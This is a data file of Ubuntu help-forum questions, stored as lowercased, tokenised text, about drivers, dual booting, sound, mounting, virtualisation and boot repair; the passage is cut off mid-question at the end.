99373	building driver for ralink rt5370 usb wifi wlan dongle	i have a trim-slice value using ubuntu 11.04 . it comes with a ralink rt5370 802.11n wifi dongle . when i plug the dongle in , it does not 'just work ' ; ifconfig and iwconfig do not show the device , though lsusb does show the device listed : phrogz @ trimslice : ~ $ lsusb | grep ralink bus 001 device 004 : id 148f:5370 ralink technology , corp . i downloaded the link for rt5370 from ralink 's linux drivers site , resulting in a file named 2011_0225_rt5370_rt5372_linux_sta_v2.5.0.1_dpo.tar.bz2 . after extracting it , the only readme in the file mentions the `` rt2870 wireless lan linux driver '' ; however , the makefile at the root of the directory does have these lines : ifeq ( $ ( chipset ) , ) chipset = 5370 endif i edited os/linux/config.mk to have these settings : # support wpa_supplicant has_wpa_supplicant=y # support native wpasupplicant for network maganger has_native_wpa_supplicant_support=y when i return to the root of the extracted directory and run make , however , it fails : phrogz @ trimslice : ~/2011_0225_rt5370_rt5372_linux_sta_v2.5.0.1_dpo $ sudo make [ sudo ] password for phrogz : make -c tools make [ 1 ] : entering directory `/home/phrogz/2011_0225_rt5370_rt5372_linux_sta_v2.5.0.1_dpo/tools' gcc -g bin2h.c -o bin2h make [ 1 ] : leaving directory `/home/phrogz/2011_0225_rt5370_rt5372_linux_sta_v2.5.0.1_dpo/tools' /home/phrogz/2011_0225_rt5370_rt5372_linux_sta_v2.5.0.1_dpo/tools/bin2h cp -f os/linux/makefile.6 /home/phrogz/2011_0225_rt5370_rt5372_linux_sta_v2.5.0.1_dpo/os/linux/makefile make -c /lib/modules/2.6.38.3-trimslice-1.03/build subdirs=/home/phrogz/2011_0225_rt5370_rt5372_linux_sta_v2.5.0.1_dpo/os/linux modules make : *** /lib/modules/2.6.38.3-trimslice-1.03/build : no such file or directory . stop . make : *** [ linux ] error 2 how can i build the driver for this device ?
99382	files saved in ntfs partition are not accessible	i have windows 7 and ubuntu 11.10 in dual boot . i took a screenshot in ubuntu and saved it to the ntfs partition . i can view the file from ubuntu but when i come to windows it doesnt opens the file . when i check the file properties in windows it shows 0 byte . how can i access the file ? is there any way to fix the problem ?
99386	no sound whatsoever . headphones or speakers , on an hp pavilion dv6	i recently ( 3 days ago ) installed ubuntu 11.10 and have spent the entire time looking for ways to activate the sound . i am completely new to ubuntu/linux and would love some help on this . i am running an hp pavilion dv6 .
99388	wubi on a usb : can i keep files and programs ?	let 's say i install wubi to a usb . let 's also say that i , while using my usb version of ubuntu , saved a file . if i ran that same usb of wubi on a different pc , will i lose that file ?
99393	ca n't boot to ubuntu after installing it with wubi	hi i 'm trying to install ubuntu using wubi , but when i reboot i press esc for advanced options , selected verbose mode it stops here my hardware is : intel dp67bg motherboard , intel 2600k cpu , and the windows/wubi installation is on a gskill phoenix pro ssd . does any one knows what is going wrong ?
99395	how do i hold back a firefox update in kpackagekit ?	recently in my kubuntu 10.10 a firefox update showed which is about 15.2mb , but i already have 8.0 . and it works fine with forecastfox 2.21 of which is has problems i see thru forecastfox users groups does n't work with firefox 9.01 , so how do i not do this update thru kpackagekit , and delete from the kpackagekit ?
99401	error splicing file : input/output error with a usb sd/hc card reader	i recently got a new droid bionic , and it has the sd/hc card . today , i got a new usb card reader that reads the hc format . when i plug it into my linux mint 11 ( katya ) , gnome 32-bit computer , i get this error every i try to copy or move any file off of the card onto my desktop : error splicing file : input/output error i do n't have the problem on a windows vista computer . any ideas ? ? ? thanks in advance ...
99405	bcm4306 slow speeds when set to 54mbps	i recently did a command line minimal installation of ubuntu 11.10 on an old compaq presario 2500 laptop . this laptop has the broadcom bcm4306 rev 02 wi-fi adapter . i 've installed the firmware-b43legacy-installer package and the adapter is working . it is using the b43legacy drivers : filename : /lib/modules/3.0.0-14-generic/kernel/drivers/net/wireless/b43legacy/b43legacy.ko firmware : b43legacy/ucode4.fw firmware : b43legacy/ucode2.fw firmware : fw10 license : gpl author : michael buesch author : stefano brivio author : martin langer description : broadcom b43legacy wireless driver srcversion : 0355eb47c162a7d873bd576 alias : ssb : v4243id0812rev04* alias : ssb : v4243id0812rev02* depends : mac80211 , ssb , cfg80211 vermagic : 3.0.0-14-generic smp mod_unload modversions 686 parm : pio : enable ( 1 ) / disable ( 0 ) pio mode ( int ) parm : bad_frames_preempt : enable ( 1 ) / disable ( 0 ) bad frames preemption ( int ) parm : fwpostfix : postfix for the firmware files to load . ( string ) the issue that i 'm having is with the transfer rates . when ubuntu auto sets the rate to 54mbps , i get very slow speeds . i tested on my lan by using iperf . i have a windows laptop on my lan via wi-fi that is running iperf in server mode . on the ubuntu laptop , i run iperf in client mode and connect to the windows laptop . iperf reports speeds just under 1mbps ( anywhere from 600kbps to 700kpbs ) . i know my lan itself is not the issue . i have an iperf app for my android phone . when i enable the wi-fi for it and join the lan , running it in client mode connecting to the same windows laptop reports speeds of about 10mbps . i also have a desktop pc with a wired connection to my router . when i run iperf on the desktop in server mode and run iperf on the windows laptop in client mode , iperf reports speeds that are about 20mbps . here 's where it gets weird . i change the rate to 11mbps on the bcm4306 on my compaq : sudo iwconfig wlan0 rate 11m i rerun the iperf tests on the compaq and now i am seeing speeds in the 2mbps to 3mbps range . much better ! however this confuses me as i am certain that the bcm4306 does both 802.11b and g , yet it is acting as if it can only handle `` b '' speeds . i would love it if i could get the bcm4306 to work properly at the 54mbps rate . i tried installing the compat-wireless drivers from linuxwireless.org , but i ran into a whole other can of worms there that i 'd rather not get into unless someone feels like it may be related to the drivers i am using . does anyone know how i can get my bcm4306 working properly at 54mbps ? thanks in advance . edit : i forgot to mention something . this compaq has an ethernet adapter as well . if i disable the bcm4306 and run the iperf test in client mode again to the windows laptop while hard-wired to my router , i get speeds of 19mbps . so all these iperf test tell me that it is isolated to the bcm4306 itself .
99407	how to configure dash to not start in fullscreen ?	i have an older screen with a max resolution of 1024x768 . according to all that i have found , dash will always open full screen with a height of less than 799 . that makes it very hard to drag things from dash to the desktop when the desktop can not be reached when dash is open . i need to make dash use less than the full screen so i can drag things to the desktop . this method ( drag to desktop ) seems to me to be the only viable way for non-techies to get things on the desktop . i seem to be able to drag from dash to the application bar on the left of the screen . why ca n't i drag something from there to the desktop ?
99411	how to ping & use specific network card	i have 3 network cards , 1 lan ( wired ) , 1 wireless network card & 1 is wireless usb how do i ping from specific network card ? & how do i use specific network card for specific application example i want to ping google from wlan0 example for specific application i want to use firefox or transmission from wan1 updated lan ip 192.168.0.2 > working properly wlan1 ip 192.168.0.3 pin -i wlan1 google.com update try pasting the output of route -n and/or ip route . seems to me that the wlan1 interface has n't a valid gateway configured . â @ mrshunz one @ onezero : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 172.16.221.0 0.0.0.0 255.255.255.0 u 0 0 0 vmnet8 192.168.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan1 192.168.48.0 0.0.0.0 255.255.255.0 u 0 0 0 vmnet1 one @ onezero : ~ $ ip route default via 192.168.0.1 dev eth0 proto static 169.254.0.0/16 dev eth0 scope link metric 1000 172.16.221.0/24 dev vmnet8 proto kernel scope link src 172.16.221.1 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.2 metric 1 192.168.0.0/24 dev wlan1 proto kernel scope link src 192.168.0.3 metric 2 192.168.48.0/24 dev vmnet1 proto kernel scope link src 192.168.48.1
99412	xubuntu pyneighborhood wo n't start	i just installed pyneighborhood on a freshly set up xubuntu 11.10-machine via apt-get from the official repositories , however it wo n't start . error when starting via terminal : user @ pc : ~ $ pyneighborhood traceback ( most recent call last ) : file `` /usr/bin/pyneighborhood '' , line 23 , in < module > from pyneighborhood.mainwindow import mainwindow importerror : no module named pyneighborhood.mainwindow anyone got an idea what could have gone wrong here ? dependencies of the package should be fulfilled ... thanks -obs-
99417	ubuntu restore deleted files	i just run command : rm -r ~/.config/ ~/.cache/ and all my files from computer are gone . how i can restore them ?
99421	nvidia over ati : choosing a video card	this is more of a generic question , call it a pool of issues vs stability in ubuntu world . i am currently using an ati hd video card . although i got quite proficient in installing and dealing with ati driver issues , i do n't know anything about nvidia 's problems or issues . looking through askubuntu quite a lot , i see a lot of problems generated by the ati video cards , and in comparison , i hardly see posts related to nvidia cards . are the drivers for the latter so good that everything runs out of the box ? so , to keep it short , if i would to change my system now , should i go for an nvidia video card or should i stick to my ati ?
99426	no tilde and no caret on german keyboard	in the course of a 11.10 install i lost network connect . so i skipped retrieving update packages and completed install , doing upgrade in the newly installed system . everything is working fine , but the keyboard layout is not quite correct . most keys are mapped correctly , but some are missing , for example the caret ( below 째 ) and the tilde ( alt-gr + + ) any hints ? thanks in advance martin
99433	audio not working on new install of 11.10	i am excited to join this community ! i am having an audio issue when it comes to flash videos . i have checked the sound settings from the volume icon next to the time at the top navigation bar and all seems to be in order , though no audio is present when watching flash videos . i am new to all this so that is why i am asking for help . there seemed to be a question similar to this , however the solution has not worked for me : - ( any help on this would be awesome !
99435	can i permanently mount a windows drive in ubuntu 11.10	i am new to ubuntu . i have 2 internal hdds in my pc . one with ubuntu and the other has windows vista on it . i have all my music and pictures etc . on my vista drive . i want to set up ubuntu so that i can run music players and pic viewers on those directories in vista without having to make duplicate copies of the files on my ubuntu drive . i 'm hoping there is a way to permanently mount a drive so that when i log into ubuntu it will treat that vista fs as permanent so when i open up a photo viewer i dont have to re-upload the files directories every time i boot into ubuntu . i mounted the vista drive with the mount command but when i shut my pc off and then turned it on again , the direc where i mounted the drive ( /media/c ) was empty . is there anyway to do this ? thanks a lot , nathan
99439	i deleted all traces of my os and need/want to start over with an ubuntu installation	i am new to the linux community and recently attempted to delete my os and start over with linux . i somehow deleted all traces of what was an os on my laptop and when i boot it up , all it gives me is the `` non-system disk or disk error . '' i am not trying to retrieve any lost data or restore the system i simply want to load a linux operating system onto this laptop . any ideas how to get past this error message with a linux boot disk or something ? thank you for any help !
99442	software center `` install '' button does n't do anything	when i click `` install '' in the software center , it fails silently , doing nothing . i then checked the command line , and got this error 2012-01-28 18:47:26,076 - softwarecenter.backend - warning - _on_trans_error : org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.55 ' } ) : org.debian.apt.install-or-remove-packages
99447	gnome shell is simply gnome classic . what am i doing wrong ?	i am trying to introduce my friend to the amazing that is gnome shell . so i opened a terminal and ran sudo apt-get install gnome-shell and all went apparently well . after restarting , on the login screen i selected the `` gnome '' option from the drop-down menu . however , upon logging in , the desktop looks ( and acts ) exactly like gnome classic . from everything i have read it seems there are no other steps involved , and i have installed gnome shell myself on a nearly identical laptop , just one model older than my friend 's ( they are school-provided models ) . in case it 's relevant , the laptop in question is the lenovo w500 .
99452	how to use echo command to show ' ?	for example i want to echo : `` let vim know the last edit position au bufreadpost * if line ( `` '\ '' '' ) > 0|if line ( `` '\ '' '' ) \ < = line ( `` $ '' ) |exe ( `` norm '\ '' '' ) |else|exe `` norm $ '' |endif|endif i tried but failed : echo ' `` let vim know the last edit position au bufreadpost * if line ( `` \'\ '' '' ) > 0|if line ( `` \'\ '' '' ) \ < = line ( `` $ '' ) |exe ( `` norm \'\ '' '' ) |else|exe `` norm $ '' |endif|endif ' how to show the correct format ? thank you~
99466	ubuntu vm 's already made	does anyone know where you can get an ubuntu 11.0 vm already created ? i am trying to test ubuntu in virtual box and did n't want to have to go through an install it there is vm 's already created . thanks .
99468	why are some icons linked between them ?	i have noticed that some icons point to another icon in the same icon theme , they have a little arrow and upon clicking properties one can see that . why is that ? what 's the reason behind it ? and if i were to make an icon how can i link icon a to icon b ? .
99469	how to invoke kernel with serial console ?	how do i invoke the kernel with serial console on 12.04 ? in 10.04 i could just add console=ttys0 in kernel line or install quiet console=ttys0 on boot : line how do i do that in 12.04 ?
99471	can you install deja-dup on a headless server ?	can i install a command line version of deja-dup backup utility on ubuntu server ? i wish to restore a backup of my previous home directory made with deja-dup .
99472	internet stops working !	i have a very big internet problem in ubuntu . whenever i load a web page or download something it will download half of the file and then it will stop downloading . after that the only whey i can fix it is if i diconnect from my wireless access point and then reconnect and start the download again . so how do i fix this ? this also happens with youtube videos .
99474	suspend usb power to a laptop cooling pad when going to suspend mode	when i suspend the laptop , the usb devices are left on . i do n't mind this in general , however i 'd like to be able to turn off the cooling pad under it . i tried the things outlined in the following : http : //stackoverflow.com/questions/4702216/controlling-a-usb-power-supply-on-off-with-linux however this does n't work anymore in linux 3.0.0 . i read the kernel docs : http : //www.mjmwired.net/kernel/documentation/usb/power-management.txt and tried this ( also outlined here - http : //www.thinkwiki.org/wiki/how_to_reduce_power_consumption ) : for i in /sys/bus/usb/devices/*/power/autosuspend ; do echo 1|sudo tee $ i ; done for i in /sys/bus/usb/devices/*/power/level ; do echo auto|sudo tee $ i ; done i can confirm this works properly for some devices - e.g . my usb keyboard auto-suspends as expected . however , some devices do not - e.g . my usb touchpad , usb hub it 's connected to and the cooler are left with power . my questions : why are devices behaving differently ? does this mean that it 's up to each of the devices to decide whether to suspend ? is there a way to determine whether a device will go into suspend mode ? finally , is there a way to force a device to power down ?
99476	ubuntu internet stops working	i have a very big internet problem in ubuntu . whenever i load a web page or download something it will download half of the file and then it will stop downloading . after that the only whey i can fix it is if i diconnect from my wireless access point and then reconnect and start the download again . so how do i fix this ? this also happens with youtube videos .
99481	reliable clipboard manager	there are many clipboard managers available . the first one i used , i found out if messes clipboard history if clipboard contents was multiline - which i found to be very lame and naive second one which i use now is also faulty - i wanted recent clipboard content and i found it 's not present in history . i deliberately copied piece of text and text is not copied in history so i ca n't reuse it , although if i select edit clipboard i find the contents that i just copied can someone with more experience suggest reliable clipboard manager , with panel icon or indicator icon feature ?
99484	why are many options in gnome-tweak-tool inaccessible ?	when i run gnome-tweak-tool , a lot of the options are locked . in particular , i 'm talking about the gnome shell theme , and the gnome shell extensions . they all have a `` warning '' type icon with an exclamation point next to them . i am not logged in to a unity session or gnome classic , just regular `` gnome ''
99485	vlc plugin error , no plugins found	i installed vlc via ppa from vlc after some days it started giving plugin errors , i removed vlc and purged the ppa but still it gives plugin errors whenever i install other software from usc , or i update my machine . like : main libvlc error : no plugins found ! check your vlc installation . screenshots
99490	how do i ping the ubuntu host system from a windows guest in virtualbox ?	i connected to a wireless point and use `` ifconfig '' but i do n't see any ip in eth0 . where 's my ip address ? sorry if this is a silly question . : ) i want to use `` ping '' in virtualbox windows 7 guest . which ip should i type in that machine ?
99492	how to set the different default character encoding of `gnome-terminal` from the system default locale ?	it seems that the gnome-terminal program use system default local as its default encoding when it is started . for some reason , i can not change the system default locale setting . i want to use another locale just in the gnome-terminal . currently , i have to change the locale in the menu manually each time i open a new instance of gnome-terminal . is it possible to set the default locale of gnome-terminal ( different from system default locale ) , or let gnome-terminal remember the last used encoding ?
99497	how do i get a cdma usb modem zte ac682 modem working ?	how to make my usb modem zte ac682 work instanly , i mean when i put the modem my system ( ubuntu 11.10 ) can recognize my modem automatically ? ? ? do anyone have a workaround ?
99500	unticked png files in compizconfig settings manager , how do i open it via the terminal ?	i recently installed compiz config settings manager in ubuntu 11.10 . as i was experimenting some features of it , in image loading tab i mistakenly un-ticked png files now i 'm not getting ( linked png system files ) dialog-boxes , windows , unity panel etc . kindly some one help .
99501	lexmark x6675 printer stopped working on 11.10	i have a problem . i 've just upgraded to 11.10 and my printer stopped working with error_log reporting : the printer can not communicate with the computer . from the research i have done people say on windows the improper driver would cause this . the driver that 's available from lexmark which i have had for both lucid and maverick apparently is n't supported on oneiric . what is interesting that system is recognizing the printer being present and the model as well as any devices being plugged into the card reader . has anyone gotten a lexmark driver to work ? p.s . this question might be closely related but is asking for a different thing . p.p.s i 've just confirmed that it was working with natty as well .
99504	why is chrome/chromium missing the downloads icon ?	i 've had this issue with chrome and chromium for some time , thinking it was due to the fact that iconset i 'm using is missing some icons , but i 've tried with many different sets and apparently none have the the correct icon . is it chrome/chromium that is expecting another icon ? ( and what would it 's name be ? ) or the sets i have just do n't have that icon ? .
99506	what can i move to ram drive to have the system working faster ?	which files/directories can i move to ram drive to have the system working faster ? i 'm planning to upgrade my laptop 's memory to 8gb soon , so i 'll have some fast memory to use . how to configure the system to work optimal with this memory ? the next changes i consider next are : - upgrading hard drive to ssd - start using virtualization ( i need windows sometimes ) edit : maybe i can sacrifice boot time , and copy some files to ram drive during boot ?
99509	does unity 2d support lenses ?	does unity 2d support lenses and scopes ? if not , are there any plans to support them in the future ?
99510	qemu / kvm : unable to pass multiple cores / cpus to guests	it seems that i am unable to pass multiple cores / cpus to kvm guests . whatever i do , the guests only report one cpu / core . host hardware : xeon e5620 on a supermicro mainboard host software : ubuntu 11.04 ( natty ) 64-bit i have compiled my own ( newer ) kernel 2.6.37 for natty ( since i had certain problems with pci passthrough if i used the standard kernel ) . i did not alter the other parts of the distribution ; notably , i am using the original qemu-kvm package which was included . since virt-manager and the related tools were failing with unintelligible error messages when trying the very first basic action , i am starting the virtual machines by hand instead of using any wrappers / managers . i am using commands like this one : /usr/bin/qemu-system-x86_64 -m pc -cpu host -smp cores=2 , threads=1 , sockets=1 -drive file=/dev/sda6 , if=virtio , cache=none , index=0 -drive file=/dev/sdb , if=virtio , cache=none , index=1 -cdrom /dev/cdrom -pidfile ./qemu-garak.pid -boot c -k de -m 4096 -smp 1 -device pci-assign , host=01:05.0 -daemonize -usb -usbdevice `` tablet '' -name garak -net nic , vlan=0 , model=virtio , macaddr=02:01:01:01:01:01 -net tap , vlan=0 , ifname=virtnet1 , script=/etc/qemu-ifup , downscript=/etc/qemu-ifup -vnc :1 i also have tried -cpu host and -smp cores=1 , threads=1 , sockets=2 ( amongst other things ) . i am running several windows guests ( server 2003 r2 ( 32 bit ) , server 2008 r2 ( 64 bit ) , windows xp pro ( 32 bit ) , windows 7 pro ( 64 bit ) ) and linux guests ( ubuntu 11.10 ( 64 bit ) , debian squeeze ( 32 bit ) ) , but all of these only report one processor / core , regardless of the -smp settings ; besides that , the setup works reliably . now , i really need additional cpu power in one of the guests , so i am wondering what i am doing wrong . of course , i have read about changing the hal within windows and tried several things ( uniprocessor hal vs. multiprocessor hal ) , but with no success . after having put a whole day into trying to solve the problem , i now do n't know what else i could do . does anybody have any idea what is going wrong ? is there some kernel compile option ( 2.6.37 ) which may be responsible for not being able to pass multiple cores to the guests ? does the qemu-kvm version have to fit to the kernel version ( there are no warning messages when i start the guests like shown above ) ? thank you very much , binarus update # 1 : like expected , a linux guest as well does n't show more than one cpu / core : root @ baldur : ~ # cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 44 model name : intel ( r ) xeon ( r ) cpu e5620 @ 2.40ghz stepping : 2 cpu mhz : 2400.400 cache size : 4096 kb fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss syscall nx pdpe1gb rdtscp lm constant_tsc up nopl pni pclmulqdq ssse3 cx16 sse4_1 sse4_2 popcnt aes hypervisor lahf_lm bogomips : 4800.80 clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical , 48 bits virtual power management : root @ baldur : ~ # this output has been produced on a guest with has been started with -cpu host and -smp 2 .
99513	can not install some programs from web	hey i install today and completely new i was wondering how do i install programs . i used too use windows and i 'm used to going on web and it installing . but it does n't seem to work on here can i get some help please .
99517	what would i lose from my system if i do a clean reinstall of ubuntu and restore my home partition ?	sorry if this question is too open-ended . i would like to know what i would lose from my system if i decided to do a clean re-install of ubuntu . i have a separate home partition so after restoring that what we have been removed ? all applications i have installed ? firefox add-ons ? i had to make a change to /etc/rc.local to fix wifi , will that need doing again ? thanks for any help , sorry if the answer is a massive list of potential things , i just do n't know that 's why i 'm asking ! perhaps it would make more sense to ask , `` what is saved in my home partition ? ''
99523	can not install ubuntu 11.10 through usb stick	after i successfully unpacked to a usb drive the iso-image and ran wubi.exe , i chose the settings there within windows and i restarted my computer and chose ubuntu . but this gives me the error : try ( hd0 , 0 ) : ntfs5 : error : prefix not set . what should i do ? i am installing ubuntu on windows xp with wubi .
99526	no bass from the speakers	in ubuntu 11.10 no bass sound at all when try to play mp3 or 2channels audio . i have 5.1/6 channels speakers . when i test speakers from the sound preference it works perfectly fine and then i try to play any mp3 there is no bass only the speakers work , i play 5.1 movies it plays fine bass sounds good . also tried to to some changes as instructed with deamon.conf file but no go ... when i turn my speakers on play speakers only mode it plays the bass but sound quality is not good compared to normal playing . i have a creative 5.1 vx ca0160 sound card . in windows also had the same problem unless i do bass redirection crossover frequency so is there any kinda software package or any kinda changes i can make in system file so that my speaker bass works fine or any thing who can let me change the bass redirection crossover frequency ?
99529	unity lens not working	i cant get the work . i have installed some unity lens such as the youtube one , askubuntu , torrent , music etc , but they do n't work . when i type anything nothing appears . i have tried to un-install them and re-install and to reset unity but did n't help . any idea ?
99531	how can i install and remove programs in one command line , and confirm only once ?	when i install ubuntu , the first thing i usually do is remove some programs and install some others . to get that done , i enter the following in a terminal : sudo apt-get remove applicationa applicationb applicationc & & sudo apt-get install applicationx applicationy applicationz . this works nicely , but the problem is that i have to confirm twice : first i have to confirm the removal of the applications , and after some time i have to confirm the installation of the others . it would be great if i only had to confirm once , because i would n't have to come back to the computer in the meantime . is there any command to get that done ? please note that i 'm not looking for workarounds in e.g . synaptic package manager . i want to do this from the command line . thanks .
99533	skype access does not identify available hotspots	skype access is a pay as you go wifi hotspot service as part of the skype package , which allows use of e.g . boingo as a pay per minute service . in ubuntu 11.10 when running skype access it never finds available hotspots to use the service . nm sees the boingo service hotspots , but skype access says there are no skype access services available . at the same locations , using the same computer but switching to the windows xp partition skype access now recognises and uses skype access hotspots . any one know why ubuntu prevents identfication of skype access points and if there is a way of making it work ?
99537	installation error , `` unable to lock the administration directory ''	whenever i try to install any software through terminal or software on my ubuntu 11.04 , i 'm getting this response : in terminal : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? in software center an unhandlable error occured there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . what should i do ?
99541	install nvidia driver or not ?	i 've installed ubuntu 11.10 recently and discovered the following problem : the default video driver works better than the proprietary nvidia driver from www.nvidia.com . to be more specific : the nvidia driver fails to show the correct resolution on the bootscreen , and there are some short delays when moving windows . i 'm new to linux , so is it me being dumb and doing something wrong , or is it just the drivers ?
99542	how can i change the keyboard model in 11.10 ?	in ubuntu 11.10 , in settings for keyboard layout : i could change the keyboard model in earlier ubuntu-versions . ( 104 keys , 106 keys and so on ) . how can i do this in ubuntu 11.10 ? - the setting is gone from where it used to be ( keyboard layouts ) .
99548	can ubuntu automatically mount a second , internal hard drive ?	i have a second , internal hard drive for the purpose of backup . i use back in time to backup every hour onto this second drive . the problem is that , unlike windows , ubuntu fails to see the second drive on boot up . i have to manually mount it which is a pain for me and a real pain for my non technical wife . is there any simple way to automate this process ? in fact , why does ubuntu not see it and mount it automatically , like windows ?
99549	freezes at splashscreen after apt-get upgrade	hello dear askubuntu community ! a few weeks ago i switched from vista to ubuntu and i 'm very happy with that . but yesterday i upgraded my packages ( for the first time ) with `` sudo apt-get upgrade '' and now everytime i try to start my computer it freezes at `` *stopping userspace bootsplash [ ok ] '' i should mention that after installing ubuntu for the first time , i 've had a problem with my graphics card driver ( i got a amd radeon hd6570 ) . ubuntu was n't displayed properly so i downloaded the driver from the amd website and installed it manually . it worked fine since then . i 'd be glad if anyone could help me out with that .
99552	dual display breaks unity	i find that most of the time , when i plug in my dell 19 '' monitor with an hdmi lead , unity ca n't decide on the configuration ; it will switch between different resolutions , and setups every 2-30 setusecond until i either ctrl-alt-backspace or unity crashes so i have to hard boot . alternatively all the windows decorations and unity get killed . my setup is 11.10 64 bit , dell vostro 3550 , amd radeon hd 6630m 1gb , intel core i5-2520m processor 2.50 ghz with integrated graphics card currently i do n't think the radeon graphics card is working properly , but i 'm not sure .
99553	ambiance themes color changed ( uri button only )	reinstall light-themes is no help . only color on left button become ugly , seems hover color is right . i search gtk*.css and nautilus.css in theme directory , also no found which color can change this . with 12.04 precise screenshot here : http : //imagebin.org/196171
99555	is 64 bit right for my amd athlon xp ?	i have amd athlon xp 1.2 ghz , 1 gb ddr ram . i do n't know if i can install all drivers .
99558	how do i start x11vnc via bash script on startup , not login ?	i have a server with xubuntu 11.10 desktop installed , and x11vnc . when on login screen i want x11vnc to start and to take some settings : automatically set defined password automatically accept conncetions , but ask for a password automatically start this script on loading the system , not the user profile . how can i do this .
99559	is it possible to `` lock '' a window in place ?	with the default ubuntu oneiric ui is it possible to lock a window in place ? that is to say , once the window is positioned i would like to press a designated `` lock '' key or select a designated `` lock window '' menu item from some menu which causes the window to become unmovable , un-resizable and un-closable until i un-check a menu item . if this is not possible with the default window manager , is there a package i can install that will add this feature ? if there is n't , what is the most common alternative window manager that offers this feature ?
99560	how can i access directly to my backup files , without having to restore them ?	i 've allways made `` simple '' backups , saving all my files normally in folders on my external hard drive . i 've already used the tool that windows 7 ( on my desktop computer ) offers to make backups , but it is n't realy diferent from copying them manualy . yesterday , i decided to give a chance to deja-dup , and i made a backup from my netbook , and them i restored them to a virtual machine , just for experiment . and i felt realy amazed when i saw that deja-dup , because it backups all my home folder , was capable to restore not only my files , but also all my apps configurations and even my background ! i think this app is incredible , and it deserves to be used on my computer ! : d but there is one problem . i have about 100gb of data , and i want to have it on both netbook and desktop ( ubuntu and windows . i do n't use it on my desktop because of some games i bought and wich i ca n't play on ubuntu ) . it 's a lot of data to duplicate . if i skip some files from ubuntu backups , like pictures , my background will disappear , and i will have to put those files separatly , which will take much more work than backing up everything . i just wanted to know : is there a way of accessing those files without having to restore them , from ubuntu/windows ? i mean , to open the backup files like 7zip would open a zipped file , so i can take just what i want from the backup files , on any os . i want also to say thank you to ubuntu developers and to the comunity that make this os so freaking amazing . ubuntu is the best os i 've ever used , specially with unity desktop . please continue with the great work !
99562	after downloading the latest 64-bit ver. , that .iso installed a 32-bit platform in my notebook !	i recently download the 64-bit version for my notebook . the notebook is 64-bit , i checked it lots of times ! but i use a pendrive and that .iso installed a 32-bit version . what should i do know ? where is the hidden the latest right 64-bit version ? i thought to download and try to install the last 64-bit lts to see if works !
99568	upgrade interrupted with alternative cd	i was upgrading from 10.10 to 11.04 via an alternate iso . the upgrade process was interrupted due to power failure . further attempts to log back into my user profile ended up in failure . whenever i tried to log in , i was sent back to the login screen . so , how do i complete the upgrade process without gui and ensure that i can get back to my user profile ?
99569	ext4 partition converted to swap . how to recover ?	while installing ubuntu 11.10 , i converted by fedora 's ext4 partition to swap by mistake . please assist to recover the files and partition .
99575	how to setup a song when starting ubuntu	i was wondering if it was possible to start a mp3 song in one of three places : after starting the computer from cold , when the ubuntu logo appears ( when loading the system ) . when i enter the lightdm greeter . when i enter the desktop after entering my user/pass in the greeter . as a bonus maybe run a playlist .
99576	why does my mouse suddenly stop working amidst any operation ?	i have installed ubuntu 11.10 , i have a problem with my mouse . it just suddenly stops working during an operation , and sometimes when the system is idle . this happens almost everyday . i am a newbie to ubuntu and have just migrated from windows xp . do i need to install specific drivers for the mouse .
99577	how to determine which version of a compiler is installed ?	i have the gfortran , but i have been told that gfortran versions 4.2 and older lacked some f90 functionality . how do i determine which version is already installed ? also , can i install the latest version even if i do n't have superuser priviledges ?
99578	lightweight ( graphical ) image editor	i am looking for a lightweight image editor for linux ( not gimp ) . i need only one simple feature , namely to draw straight lines ( with adjustable thickness ) over an image . it should be possible to move , resize and rotate the lines after drawing them .
99583	show desktop like in windows 7	is there any widget or anything which will work like windows 7 button in right down corner of the screen ? this is , when one move over the mouse on the button then all windows are hidden and when mouse is off the button the appear again , but when the button is clicked then all windows are minimized permanently .
99584	windows 7 wo n't boot after installing ubuntu 11	i just installed ubuntu along side to windows 7 , and now windows 7 will not boot . when the system starts , it shows me entry for windows 7 in boot menu , when i click on the windows 7 option in boot menu , after few seconds it will show me the boot menu again and windows will not boot . it show me no error message . windows 7 option is available in boot menu but it just does not boot . here 's my boot info results http : //pastebin.com/ga9xjqyh update - 30/01/2012 i tried windows recovery - fix start up issues - that showed no problems but issues was not resolved then i tried widnows recovery console and run following commands bootrec /fixboot bootrec/ fixmbr bootrec /rebuildbcd but that does not help , now neither ubuntu nor windows will boot . when i boot from windows cd it shows me a valid windows installation in c : \ drive . update after a lot of help i got from # ubuntu channel and trying out different things , ultimately i can now boot both windows and ubuntu , still the issue is not completely resolved though . here 's what made it work boot using ubuntu live cd and then then run the testdisk utility as steps mentioned here restart system and i was able to see bootmenu and boot into ubuntu , then put following code in boot/grub/custom.cfg . restart and now i can see one more entry to boot win7 , clicking on it boots windows . menuentry `` windows 7 ( loader ) with grub ntldr workaround '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root faf0f57df0f54085 ntldr /bootmgr } it will make windows boot probably but now windows have dependency on ubuntu and i can not remove ubuntu or else windows will stop working . credit goes to 'jordan_u ' on # ubuntu channel . update here 's the win7 boot details i got from easybcd windows boot manager -- -- -- -- -- -- -- -- -- -- identifier { 9dea862c-5cdd-4e70-acc1-f32b344d4795 } device partition=c : path \bootmgr description windows boot manager locale en-us default { 04fe8f95-4b17-11e1-a45c-909d3d25f938 } displayorder { 04fe8f95-4b17-11e1-a45c-909d3d25f938 } timeout 30 windows boot loader -- -- -- -- -- -- -- -- -- - identifier { 04fe8f95-4b17-11e1-a45c-909d3d25f938 } device partition=c : path \windows\system32\winload.exe description windows 7 home premium locale en-us osdevice partition=c : systemroot \windows resumeobject { 8d25a443-4b0a-11e1-a835-806e6f6e6963 } note still i am looking for how can i have every thing clean and how can i boot windows 